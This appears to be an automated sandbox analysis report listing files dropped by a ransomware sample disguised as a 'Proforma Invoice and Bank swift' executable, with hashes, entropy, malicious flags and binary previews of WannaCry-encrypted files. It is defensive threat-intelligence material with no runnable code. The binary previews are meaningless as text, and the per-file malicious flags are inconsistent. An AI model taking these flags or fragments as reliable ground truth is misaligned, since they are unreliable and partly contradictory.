                                                          Preview:WANACRY!....$.S..}.......U.v........&...&."...X.9r...s.@.).g.......;......I.......=........3...=.x.]c ...3hLa....OQ.....o.U..P0.`......i..#....E..)...t.?.2.."..*,c.w.O.0t\q:.#e&..<.T.Z.<....F.s.. ...R...........C...9.`.M.oq|........U.cj.h...o."I9/..XVp.ZW.P:-....g........3.....|...lb".h..P.T.l.{.?..-w.^....eJ.D..h.M.(.<zE.g..z....t..L..:.....-.u...nC....F.{#....dz..l/KS..$l..\.l`..1.rw...(....Y.z..wE..\ t......T............E...F2....4P`.:H..(j7....$WP.`.I.L...7d."\....G..PP.w$..!..H.D.M..BE..Q....h.......-..../.......\....q.....pH.r@MA.ze82D.P......Kv.......i..XH......(...O`........^. |.F..:9..[y.2T..Q....Zh[.......6..N.Nwl.6.......i/........P...._.....;...T0X..s1.Z>...WTA.l5..g.o.S.nr3.5J..`.f.@.Q.d...C.jW=S...x..+e;.'...p.J.]l.............W..V.s.G.>.m!..B.......8J..........V..3...z.X...r.....f.g......x.C.........|4R.l..f..oLI.....edK.Z.y..-7S..cF..S..d.l...5..t..K..o..&..C..=..1....!.F....f+....dc.7J...Z."=...{M1.....4...-J.....F.=sd
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6136
                                                          Entropy (8bit):7.969707327113116
                                                          Encrypted:false
                                                          SSDEEP:96:ojonc9M93gxPUg8QmrrKWzGPDgvNcnVin1SUp5smrEg47jrivDDntaJNaHE0haIU:Xd4l8nPvQgH1SUTsQperivDDwJOgIU
                                                          MD5:F0FE1F3C621E554990C4EF13E634B805
                                                          SHA1:05C143F3984AE540EB2348C626E7B91A9FB10E3A
                                                          SHA-256:BF893C800322A0AE7FE1196250B0281880AF3A201F2DA7576D5DF98B7D4455A2
                                                          SHA-512:9FA1DEAD2862CB522A625A32702DBC0827F99503A6AC833EF38C541F5C68F19C6A529246A6E2EC0F3DB7A655C10401568ECB31410A5929B334AC3C2EEEF8B2AA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....r.0..g.1........E.........Tl...G..KJ...;..#.... ^...._..6.YHh...`.+d..S.....;W..l1..0,.#k..N....mM.I.R..d.b.......Q.".~X...+:..^....7.^. ..6.......1.....m..\...D%.L./8....0..D..vs..)..%".G.........jZ)..~m....C.i%.}E.1.Uz.Yu.a|{.>m...p....~.B.............Y,...q..|....z....k*.1.oR4..e.........[..*...c.Ry.<..2...^..d.V9....Ut^.~..R.rQb..|P.[.F...e...7.Fm.<..H.2[...e..S...............-jk....>(z.0u>.....V.O..&X."t....i./".T.e;.2.G2...[.ky..QuK.%T..|+}YP.).v.`...G....CM..{.(...Ln8.c^.~."5.:...q.Z.'..5..}S..d....2?...7.P;.....ynR....o.. )7.^)..4s....Aq..t.*"C....2....{Y...e.=.......t..<.;.......>.v...........v.S......l...T.p..l4...@?..yo)...>;.T.....+H...S.hZep.~.P4G.....[........p.u..t.gF..3._..VJ.R....[.1A.k..Zy.G.&.L..cs..4t.6........H.....>..k... .J.S.Km0.........2..T......'.k.......f.R..>[Z.klU9...B\((.V..AY...5...].0...k....-}..3Y.+.cK.BcE....u...... ..QP..P...p.<....$w.."t...x+|.3g!>.m...[..].c...^W..Zse. ..U...wv.....;.Z
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.636606198293026
                                                          Encrypted:false
                                                          SSDEEP:12:bkEMtI1BVkIe9F0Fi4yPkd0Q/xJ7FJk/U04uG/nNvvajM6nV0xMmy/dcJ:bkFtI1BVkIe9FCJyPunc/UBuG/NajM6m
                                                          MD5:39A60BD22ABE7AFFD59DF6EC89CBE6F4
                                                          SHA1:84478765800154CE057DB944E999A9DFB69C9658
                                                          SHA-256:BE5B3A2CAFF1616D2DB4E5A1CD04A66005388F39AC8B43E4ABFB235C74649F62
                                                          SHA-512:7509E0FCD166CCC70E4458D99D925734F0F226D986BF9A0CA3C0596AB6C54CE7E32D230C0D3E658E3681C4A0BD8E56D33B29CABC047205EC4911539155D6A966
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....O.G:e.XO...rJ5.t!?...........8.......tFSQ..>J...<.b..8&..G..90.[7........0a..gurB{.@..C.-JB%...y.x(...p.Vt..'.l......VW.[G<.c...(...@.F..J.2........3re....9Py.dz.83...=....s..04~.v.b&x.#;.Q.5...H-...^..DlrRH.6......."R...p...N....u.w..........<.3.....'.......2..........H............I.R...<.U.5...9.rPX5.:../.....p.....v.g.HDa.3}.....?..qP...8.g..A.].9:c..X.Dt...|...R...d..N...xC...z........]9;..%...5...B.1.......u..>.._..?.....U.4...*.IT....}..?...V3B.%....Yh..e.1...s~.8.e..4...M.<TxY..IK..v^..Ri.?.{......b.. N n.k.?.I.TY.leG.KN..f.6........^Sq.}'
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):363208
                                                          Entropy (8bit):7.999471948074989
                                                          Encrypted:true
                                                          SSDEEP:6144:QvDliW+QmMEqeK0/V/D/L/75yI7LIHsH3f6DhM6QK5quPfPTgIjkz20E:9W+Qmqeb/DPYPHsH3f6DhMafjkiB
                                                          MD5:5D089BF3A02E89C540D902F6140F8023
                                                          SHA1:975631BBF46AC89EBC869FF8E8228112CAD25364
                                                          SHA-256:DB86B94C1E0A6C5E046100E7541749D85ABB8D3807016B0924A10EC42BE40291
                                                          SHA-512:DE1592CA08CB5739A3240339CFC74FCDDC14F5E6981A41BFE956AC403FC643A35A0F516C16948697A726516B325C8A39A041B5CE70C7CEBBA7A32FB6EA0A9521
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......DFX.......J&.n.d.........4....g.68C..9...^.i.kC.#..K..B...3..x...T..8..b../A....p..E5...9..0.!.$.Rc.o...nw......h...M.U..V@..U.slG......#i....Z........pv....+#.SOw.}..."W....v.H.3..a.:...u).x.J>.6...._e........B8..!.......h...i?N..Ms...|..............(..(`..s..j?&.)k...@.R..........|1...Z...T....M..PT/.c*%..u...MV...E...q,@O........B......B..5.".."..cf....P(.....(P....S....%.Sg.`....{.D....d..gd.)[.b?}..]Iv.0.;R..A.Gn.e#s..WG.##8?.Q.....U..f....n.t...&..o)..#.N`qr..,.H....U......r.[..9.c+K`...6G......{..P.3...D..y...L.v...cT.........Qt...q6..t..M.u...U.....".W:.io..oin...Q..9xk....x...i..m...B.)f....f..z........w...O.pQ7..}..l7mT;...2+.V[..bhH. .........2n...z..U......2B....m.\..w4......44g{{.(.<Wo.q.;.<r.....3..~..Q..G:!|..^.8.U...!muZ]..d....=LM...*Q1..).!`.U. ..3.oZ.g5.V./O.x..F..m..j:hi.."...Q7kg......{..".t..EU.b^-...6.E..../.xn...5.....*.CW7..R........-..P.g(Y...0A.."f_.*.........{../..E"!j.U{.......R[h5..VR2C..;..Iv.._
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):7.837561438059522
                                                          Encrypted:false
                                                          SSDEEP:24:bkQhka4Z8KLy0RwJP5S4Gzk4uHo4oZsepaj8+qII6Ttq4NW3OrFjtq3z:bkXHZVgP5R4kbomDFqIImwOrFj8z
                                                          MD5:F1B08092CA7BD33A815B784758D6167A
                                                          SHA1:5C45244BE771CF7D1DC845095BE0F38C37A82E11
                                                          SHA-256:B41522B32FB2E29610099964CF9AC67BFD1C12DE171D69DC5C55AFBCE3FBB5BB
                                                          SHA-512:0521E6FE9EDB0885AA590B55EC44DF7D2AE98BBC270A595DA607860D756D0F07CE03CC5E7B35F349F6F18EA9AF15871B43F3866D3BA1C58B22469B498B597381
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....j0;8........W....D..ar.L...3..M!b.\.H.....!.v..9>..'z?^w$.1...:{..r.4......$x6....U...<...R...G.8..ZR+6.. .x/..Z.g.4k.....2..23U..R.z.....]7-..-.h.n.0u.T.'H.t.(..M,.....3.....Ed..6.|=.......Y/..y).]:-...3.f./....~..O`l....A.T9.s{..%..3r................!*.......M.M.ubr.<...A.. ......|....+..,.........?....._...w.j.S.....hX8.c....tI...@.9.{. ......T. [..gA......4..b.[......PZ.....v...#M...1.m..c...d.M<..u..G).\2|o.Y...c...H3.E3....cm.a...-.f.'....0.%..`.....y...aW..O..KR...?.....3....X...&...W.....V.....[D.s.a....hsq..0.>4..^Y..!....E>.q...6..c.mW.6..U.NJ..X..ij<..N^.t.L...IaJ.A. -9i...mG.......A.:...0q.....8H.)..=.[..5b...RL.....0.s...V..aw.j..+..l._j....<.......#28....O3I..;..>c.~..~()8.P|o.v......p ....>eyN...:t\'.../.. .].BZ.N_P)c.Rc....QS......@...M.....9k..6....O..n..Q..O.N.S....r#(r......0.U%.Sj.bC..U.i<.....-...U 6.....e.)d.f....*...8..,.k...C..2.h..H.p`+_.t0U.aO.;u....J.....d...&.>..t$q...N,Tbm..E....:.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1608
                                                          Entropy (8bit):7.852201060571658
                                                          Encrypted:false
                                                          SSDEEP:48:bkXsSKOFblAVhkUtd843OnpfTgLs36crMMUm2AMTsEXdNW:oTPFb0hkUhe536crSmpMB0
                                                          MD5:DD39077E7DF9F2F823EB186B06FD82B4
                                                          SHA1:762272B3B490A6FE3642455D268661E4F6840478
                                                          SHA-256:210CD51B28340658B184208A0E3FC0E4FEEC99C897A4DBE5280FC5B2339FEA10
                                                          SHA-512:FB46BC1348AFC322B297757C9E9D1B98120E0180EF923F6C1386224E67D7F65980B12D7BDCE1C41D8833EAD815EE702FCBA9892BD928EA8263F92B41DD0558FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....H.J19.:H.......o.2..lf......)J8.A..eop.....i.....q....?....G.yJ..=..K.>.".v..)~..Z.L..T.k..oog..WS8.....O..&'A..!..B...)&u.0.WE.2.o....47iMv.5...H?LG.~....c.......).Y......|G.i.`....3.#.<..._...}u...-.Vj.....g...........,;1a...z.?F.....3...D..0....%.......@E.......D........1.P.6G...[..L...].w....o Y.....0...1.@KSD...Ou.T...:..8..w....C.,]g.X......o.....4M....+.....J....gP..E...5..)..?.Q{u.+..sSe...2..hhE....]..: ........W<.B~..U1,..=.......*.Ql.7;....A.........Q...9.....T..-"..u@./..x..........K.n.....dP..Cw:...jt...R..c.[......c..I~....1.C..U.OR...T....;.....B..D....r+M\8zG......U]..Cs.hX....DDu!@..<...p..o..p.....,.h...j.....$......1........*.K...z...d.)-`8..J..X$.m..3.oW.4..$.}.9E.z.........7z[..s....=...F......L.q.....NG.....H...$....;~..#...ln.tN..O...........,}....%@~......s.....xq.....z&!.R...*..yH....jq.:.C\%.\^56..whR..P.7..^H.1.....:..P.p..d........N.F...3........`.%...1..>.|...".I..5....\..^.9.w..z%..."..!...a..mxQ
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):493400
                                                          Entropy (8bit):7.999672722265242
                                                          Encrypted:true
                                                          SSDEEP:12288:LzyrZgRDr2NePO64X104M8KqVrBqftFUoRQ8U:Le9iDaNeW64FXMFUIxU
                                                          MD5:892F43524CF91E73075D765F7156C905
                                                          SHA1:2870E0E61F18BD7BD49B3CAC140527B8ADB45758
                                                          SHA-256:0C244A89E3F7D8BDC5F52BB632511D819DA7526B7BDB50F27FB308C85C5B391F
                                                          SHA-512:810F7F65B00C2594DC12C3888163F95D02E68F592DFB1D3FE11B039D7CAC0EBD907A9D2AA25070B13636216A48C790A57D3C55CF7EFE159028BB38B4C9D33EF9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....d.....5x_p....V.....^..Hj......%{..~.r1.|.S#....l...&....I...'....H.B.I..+^;...../....G.#G...uO.BbR....Z.&.WI._..x..xr......._ ..f.>...hz...>`.Q.$3v.stJ...g...../.."8.%%&V+.qt,)M...\~(..n^.2......C.....Y4..........:.0..%Q...!0*.m..@.$.|~.....2.......s|...[r.QD.|>.+.h......>q..........b........hJ...g.......z2ch.w....pF..Ex.m2...[S.....rn..l.*h\.`..*......S.80.F]...k{K....jf]P.'..E....5..[...Q....ph.fh2u..._..LI....&..6Z.'..|.Qt...$.Po/#.8E.....6'....S.......V.....~A.....T.=.....'....4...ldzy3..b.H.#../..E|6.....J.r........R....4*..P%|.SV..9.~.ZL...$.q...#7.z...,..Z.S...2.8|0.....G...z...B..Z%...2.m. ..*..c.I....c0t/..t..r.R+... ....d^......|..4.].V..X4...........N7.D..O.9kiqs.q...../n........(.{..`..Zh. ..Cb].p......y3.".....-5.\oz.....'..........#....t..L.je5.+..Rk...B.mr2..K.bj..~.E......c....cq....:6.xD...}.}.X.........I.-..:....ku#.........X/..1.\.!...,H.U..5.0..f2...!J[ ..16..HB.uJ.V$.p....(.G.(...kn..."...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.549012189617492
                                                          Encrypted:false
                                                          SSDEEP:12:bkEr6+3odpe/91QmEfQIB/6tfQlz5yba2jNbP+pb3tAp491CErE:bkG73oTiQmEfQIB/jDyLjNyphAk9E
                                                          MD5:1876268B6922DA9CCE87CAC6C8BAA108
                                                          SHA1:EBBCCBB1661D2DE29D4E93B5210BAE77BB642106
                                                          SHA-256:4D9385DEE0003A524907ABC6D9C4DBCCB25FB70A9397D6F379A272CE097C7B32
                                                          SHA-512:2FC091D2E0C9459D7105118D722AC57B8AE065AABDFE5C5C5D458B5C4A906014BD371E2DDB7B9AB88D292730FA5F1D70257491952EB548935F2F85E931C7DA34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........k...B[........0..8........-yk&OMDC......[Uw..|f.>.v...v.M.+@..vgL.`..~Y../..L#.rmKr.a..B.+.......x........D..J....V<...0..B....d....(.<....v&.._....... ..Q..;...."/....U.%..J.v....hB.a.E;.=A^xi5...ko.8\..1RpS.n.....}..GT..q.UoU^.D|....w....'.......d.^..~.....(H..6.........rv(...F..Nw.L.3..C.@.db....k.%LB.t..&....{F......O).j .,....p.!.H..U......s..87.U..X.*.:;7U_.(...........DC~....I...7.Xi;M..N)4a..x..$.*p.....f.[...j.;.._..#..B..>..,..X8BT.n...J.v...<..b.XM80r.z.b..rS....X~)...|`.3.@3...V*.L.qs......F.%.....;...5W..G.8..c.b2.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):329976
                                                          Entropy (8bit):7.999385055937669
                                                          Encrypted:true
                                                          SSDEEP:6144:7GK6GW7nnw5kt0AT324znle19FekiZb3xLBinVUzaxcQzdOemnKGV6:b0qA32aqeqVE+dwKk6
                                                          MD5:9577A50641282E10C906552D793846EE
                                                          SHA1:85F6713B0625B1F3BB01CFC79F56606596867825
                                                          SHA-256:51A9C0BE5972B390A360E9D77779ABF76AB89BFA163B7644CA01BA8A0EE53006
                                                          SHA-512:9E07474DB3E4BFA3D14A37D35796532A524036C02CA07072B53F16C64ED00320D6B08448B155A54ADB76D1C49E0B64BA06A49C1922355D13832C229AFC2784FB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........1....{..U.8.....b..[.\...M.......cfW..C..O......f.}4..]...O4..=zF..JQ.S...W......_....HVpa-....z7...'.......P......LA.~X...j...A-B....I..g..].i.......w.Z.'.....\..`Q ....<I.mm....p......."...q8./.zX.BD..........[. ....c{..9..@.....Kq............9..wdB.1.1.._...{..("..c...0 ..Hr..Kmg....(.O.{x...Y.>}L.8/5.8.".2.l..9zSR..u\....!|.6|..?S......![..rn.J...l...O...ur%.....M....V./#7..l..#W..Q.8B.'/.^.i...B,.<0..J.G........._..1<h...sI.di*.e.....4...!.t$9........pK..i.f."..,`TL;..+y..0(]..$.b.6.....V4.....t..`....s.?1.~.7@..K.@tA..-..T..............a2.C."..$I.Y}*...g.O..J...y.\xG|<.V.../...:..3<{...>..*./..v..a=.>.G-|p)._^#o...Y...$......5.....<...pL.tv.|]...........uN..yb..Q...z.yw......<....[..<.jr.XRB....-..8.C.ss.G.W.V$.z.r..zb.[....[.Ox..y.}..zW5.`1........I...C......L.=..~....<.....`y......h......C....>L\...B....*..=.y/.!..i....:6F....v.:v...L.9.u...L<..V..xa&..........4c...y...y...s....q..M4..P..q.d..?G....t_...M..+bC.'O.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1608
                                                          Entropy (8bit):7.863949857518728
                                                          Encrypted:false
                                                          SSDEEP:48:bkT8NOTWFCG9a3UqV3Xlle9WK6SqRwQOQHeA7UwS:oTSOlUo31leEK6NRwYHmwS
                                                          MD5:1CFC93BAFC8E93D573774DADF4FB0C0A
                                                          SHA1:996F5F3F56068EEBDE265818C00B2C2BDA556545
                                                          SHA-256:2FE53FDBEDBDB104025BC0E54B85C962B2D83580E1DECF074449532A6A02C39F
                                                          SHA-512:4E6AAF44C633C3C698EF0BAF1850B64F2D6568D951F198FF139A10F8AA2D560A333C9B09D6BA14F635750DCC16268F997462CCBC68E3F78CE8A87C727A6C2BF2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....p..`.V..d...cgt...."9e.yZ.I.rG..XF...e.B.].....A<%....\g.h.u..yr...fP....._..p.Hl.+-../O4]].K.B_^;.....m....j..,W...............[s$].0.f.'...D/....Y..8.Wgz...U....1.GG.c....}..w$.......r.......ob.G'A......u..._.5..4....>x..O*...n..o.....H;z6.Dy....%........?.sv|5..(.....1q...t..<..r..WDz...".._.\....l......'.....OQ.5..!.......C.. ..<.'I.S5A..@....A.sOaI.....%XI.&.9.....0d....AN.....r)...\0..`.........v.....Cu<i_.....bc....xm. .y...0...|..%k.....$..!..HAB$....V.+....:....4.f..<.,sZ.hsHE...)7&...D.* .i.o.k.%.2y.....>\./f....Uf. ._H...Xx.........g%..YB.../..$ .....2..j......B..c...>z_.........,...?..`....=W.?n0..Y!&F.....>3Ay`..DZ.i...\...m.....]...ka...z....t...."..O...E..A....1+..Cu.).<..M..,..Vg0.$d...M.......|...sO. .0.6...v.1...PP..h.....XK:..A.9...~..o.g...x...K..n/..u.mZ.^}Q.......~..$..-.y..j..S....w...l.... .tr....`...(g.N....8n......g...o.. ..#1.x....1..<. d..1...V...2..uNJ..M8.a.8.0.r...>..%.F.L......D<.qe.Ey.GjJ+.y..r]..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):552536
                                                          Entropy (8bit):7.999603439915225
                                                          Encrypted:true
                                                          SSDEEP:12288:CNn8vzZXc2h/47ATbzeDlG23tQeALGak4FiKk0rJSi3dBwAaSvB:CatXc2h/47abqDlG23tTmwHKV1SuaSp
                                                          MD5:DB515E5D655AAB76886A0AF7598D02CA
                                                          SHA1:E68A16D5D216BA8319BE5975EEA446BA6A8F192C
                                                          SHA-256:BA83319ED612009E191AE5EA594B23312FC7C876EB0E2C2A290D466DCF46D239
                                                          SHA-512:62BF83E85CA4BA776E8798AE5CE613AEB30727BF961C795A6EE0EBD5DC48FD5325EADBD8A408EDA91A869525808010C57D32C6EC38A1CBC601A3B0AC0CF855EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z...z.`.../..v..#...e3.33...H.^....B...d C.w.^.l..N9........<.S.)..X.G8...m..G#......(.j.8....L1.g.>Bx0+.u..N..x[c..%...l..9...f.*z.z.......2L....GO....W8.S..uyh.Y...J.A..].....D..en.{X.&...|s.t..2...L..u......,i.I..........P:0t..l../...}` -f2....9m.............8...............r.u.....k..m.4..[o.a.2e.9.?'.\b.........'.J.tE;..'=.x..k^....P..y....gk4_.O..@...W..v.>q....e?....K...W....."<Z3.....$...u.9"=Q.k..}.".t......t.}.H3......K.......|."q..........!..\..0.~+..>....~8.....G...u.v&...P....v+.Y.....J...@.....Kn...2.!L.....z...W.)>.."...8wC.X...QK....gw...70rZg;x..(b..0ol"..T?E...)>...H....X....^.X.%8.&.......0]......V..D..\|j....u}..*.f..P0(k....c5..n}k.b./Xi^.{]..=.8.?!.......P.M......d..(...:..Z.A......4gD..1.y......X...B.g..YZ......;{J..s.4.....f.S8...0.6.X..5O..V,.U.n..ep....@..}.S.sE.$.5a.f.J.^...L..{P..8..;}...&,..<3...h....]..Onb..0T.<).e.j.#.@...-..L.......q.p."...W1.n#8.......G........r,o).2%q..".n..S.Q.m....`nHT
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.227463602520149
                                                          Encrypted:false
                                                          SSDEEP:6:bkEPUGXQ5G1dSPbQDpeD0ldIz9HeQTB2AAqPE4pUYdxlhJrps60H5RMXI+xaoX3:bkE6Wdj1aWu12APTeYprG6a5RMXf/X3
                                                          MD5:8F1A40D674D8F0AE4DB0002012495B03
                                                          SHA1:429B8E30B11B075FEE4002E93BBE0304CF8E3E30
                                                          SHA-256:43F93FD19AD8E11C964CFBEFAD15EE10C47F1D9FC6CF8DF5E7EFA57258A65602
                                                          SHA-512:A5F4C6CA530DAEC30ACE8BC06044AADA4EF6F87E4477AA35CC433EBDA6597636A0154DBDAA7C2A5FFE133C23B5B6BC3D9CAC183C765EA10196616620B0F67A05
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........}.x...]|......u..M`........n.y..v......?...3..5.P@j.`..RA.!*L...).........g....J...'.8..?...\.".*R'{.8.~F.>5NX......... t[.8......&%..B.x.....FQ4.x........&...[L.]Gy^...OIo..;._.8.qa.......A.kA.>...z..P...I..sB......z..B.=H L..r..*.......%.........8.t.)o..ko..,....aX]L.W...^fV...z...X...^_4;
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16456
                                                          Entropy (8bit):7.9883821885952955
                                                          Encrypted:false
                                                          SSDEEP:384:5LX5z7uTtgv9gh1tQSV9/zT+K4Hs9LhX6wAW:pX5zytM9gh1Ks579I1W
                                                          MD5:D785B6C7E5E910667517CED426221AF4
                                                          SHA1:2B8C50FCEF9D3A588DC812A963642E3BF8E17759
                                                          SHA-256:AAE4CA699F297A43828907652A62941E55BF313070304B38FA2B3D5158B3ADE2
                                                          SHA-512:3A5C2A2AA4C810B547BC70BA15CCBC00A193ED22CC56DE03CABB2322E05017F0BFFF4D3DCC351B9E37F4D492EFEB7BF1493AF99BFFAFFFB24C77A45FEA5936ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+q...3..C.@.l...q"u......7R4....D..r...+...I..$...P.......J....bY........P.W...K..Oo......>..-.u.....?..E.}j1...Q..!.T39z.w.|.l....=%-.....,..8.49..9..I..0..B.......l........|....|..*...W.o..I....F.m.+s6&..vF...79...'.../...f...}.`-...T..u.%....$?......GJD....K.J8c'={S.......z..f..u....Qe......._.+.V.|...!.y..e.....R]t..&..?.q..f.....x.:.:.....4.*..WM..='t..[.da,w\..2..l.(...=_.......k...n..3g~.c1..jS0.%.N..i.0.J...0...m.(.i.~.K......`.@`......gz"\....].!..i..$#U]Op .=..P.K.......(/a.6.....T..].X~...m...~..>l..<..Q...3.i....4....M.4QW.........[ws25.=.JNR;h....*]....i..1\.A.3&<j@( 1..3.^.?c.H.^e.DxuBW...9.f.T.vr..i...k.#..4.5|>..I...g.)\._.-e.l....d=..QN.g...[.a..(.#.....&.,....m.....=<y..|c......;/..E.9....a..,GCPY....TTQI..m.'...?/>.R....R........i+I..8...g..E*..+s....jL.?._...x.g+.@.m........*fI.;..72.\)...p(-.>^...v).[...f..6.;..8.N....0...=d.....y..i.C.j..aa&.a.._4....Yb+q/$...A.....FX!.....G."N........C+(D..h}.g.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2088
                                                          Entropy (8bit):7.911427253178882
                                                          Encrypted:false
                                                          SSDEEP:48:bkJ3CpBI6LFq1mg/7V0DCVymLoAcU8kOb7NkaTzy2gnE:oyBISKJ0Di/Rc5kQpu2kE
                                                          MD5:8F42186073B96E047B7E2088847E88AE
                                                          SHA1:E3B54B9F74E5076A637800D05EB80F9597493425
                                                          SHA-256:A69F54CBD552D95483310610A58BFDE2A2274EFCE26BE5930F11475C132FC78E
                                                          SHA-512:49C7FFA53484A070805519813292D44AF4FDEF38DA8FC609C3C046938595EF05A4CFDA7D69CA0DE3BDAF8E53A715541B0783B7613EA3F2230D1B19CF25D23A62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Id.].....7...C5".hE..+S..f...2.&bv..r{`.C.%s...d.\..C...@..d....e4.,R.T....q..F...&..2...S.....h.E..C.`}..yx..*.I......bH]...jm.wd..{..PV.dH.....X._.F>.(=.N>....;.....~.A.h.5BJ.7...1<*H.n/.{./.7Pg....&..Ad.,s...f.x..l...$G7.~..3(.`.8.L....].<o..................M.....>........}............wb...wGF.c....;.Rb_W`.D/.r.c-.Kv...pD].{.s3......S.\.....s`.H..g..|.g!.fY....". .qs"..\....T....?+l..lO2A.(S...BP;.1GK'....z..q.....t...x.2.6.".s .....,.f~s..D.}....=..g.pA7E."`..Y.D.....T..8...D.,.....m.,....\..d...3..8.g<.=.B..?..;..f+..R..IQ.....#.P...4J./..y_V.(...e.v{~...s..KU...e.j..(...._ 9V.!.#......U.......)aM..k/....w;....K4.#...k...h*.$.#.@..,..L.7.PK.J].l7d...5"..A..=......C...^.b...+..U...8......k..is..R.R.........V..........!>.vAq...R...t.#..AwZ=f..f.E.vM$;m'R.5.D..Gx.2..S`..2,O*.U?iU.O?....l.....<..... ... .....s}...6d..e}...')...B7.tn...J.f..E+.x..I.Qj...u..(.+.w.#.e,.r.{..b.$.z)....*Y.6..a.r..d.0.&k..W..u..^...s..LL..[J!..^...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1394952
                                                          Entropy (8bit):7.999861487038997
                                                          Encrypted:true
                                                          SSDEEP:24576:Xp4ZGx+736WzHmnyBB5qsprD0viTJYXodKDLz0HYJ+Cb+M0:5IGx+z6AoyJqsVJtYXgyz0HYUCb+1
                                                          MD5:59029487374E6304AE2D4D82DCF2CFFB
                                                          SHA1:77C1F5E2B147BDE92D5D51660F4FC9B5F545FEB5
                                                          SHA-256:7E52C1638E0A6C3BC46A3B04B26CE5F85873A89F5DA997A2D4EE24EEFCF5ED9E
                                                          SHA-512:E770E21827F6BB733190676211871910964899FD3D04F1EE2312EE2518B89F725071AC0632750B4E92E6D7D93CE969DF74994E3CF5B402E66FDF5F44D669B47C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......&.FkE..z...H.L-6....p..c.Wf...C...F8...rF....<.0....x....Kf....d?&u .......U+n....XO..uO./..Ko?C.J6M..'..K.D..2Rs....|d?..e.l...s....Y.v+.(.w1.d(..93...x^..M\h9YK.cN87..;vP>.c.!.E.yg...FQ....<....:.^...RHz.qx..N.......4...D".g.b/%.........>k..6.o......G........y.....:k.i$.b..p..^..m<...v..o..KOI..Xz........PY....z...HR..JD..D.....[..Up:...:.g.N...{Y..U..._...3...@..{........=..]..C..%c...9H..g..V..Q.l..tC...=..^$>+M^Le.*F...B^./.rJ.{..2.T...<c.E..tR\80..c.....2..9.q.M+1...A..X.;...g.-.m..v=.<....r..KUR...R('.......Z%.......6..A........$V]....$.P.+Fk!r3.. ..l.rqK./..R...$z.....+{..>0.J....j`.l#V...."h.UYC] .1+....=:..<./.).W....p8..c..].x.P........8g....<....i..[...(j..3hiH}5n..70....%e.x..w8@k.Ex....Z>...U...i..2/.(....G(....M~C./T....#Q...Q....D...|.i....(:..%..x9m.f.B..w..+...h.q3. ...!.z{YS.5.`..L,[..r&...\7.j[..&.hS.~.Q...._...c)..............9z.ux......q...yK...V..v}.....4~.OZ.....7j{.9...-v...x:........":=....Y5'"Tn.[.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):488
                                                          Entropy (8bit):7.512172348034761
                                                          Encrypted:false
                                                          SSDEEP:12:bkELC/4SnE68NVfmRjRpCGMF6N5yU+w8l6GN6lUGjNJgn:bkVnE6Gtyt8DUpGNOnjbgn
                                                          MD5:0BCB9C9B8CE54E562D66804440775941
                                                          SHA1:CE4FEB3735E9AB21926EE427E6F4E440634B99ED
                                                          SHA-256:16F4383ACCE97065D13EFC9B7343B3ECD8D0219920B842B448280D682BA87D10
                                                          SHA-512:6F2569F4566DC61A23093286D23356140A7B4172142C3E3674E95C5DEF9DBFD8FA041A4DA0BFEA1F8B08B6BAA8B4205EC497690356A1146A186F98E1D3598F64
                                                          Malicious:false
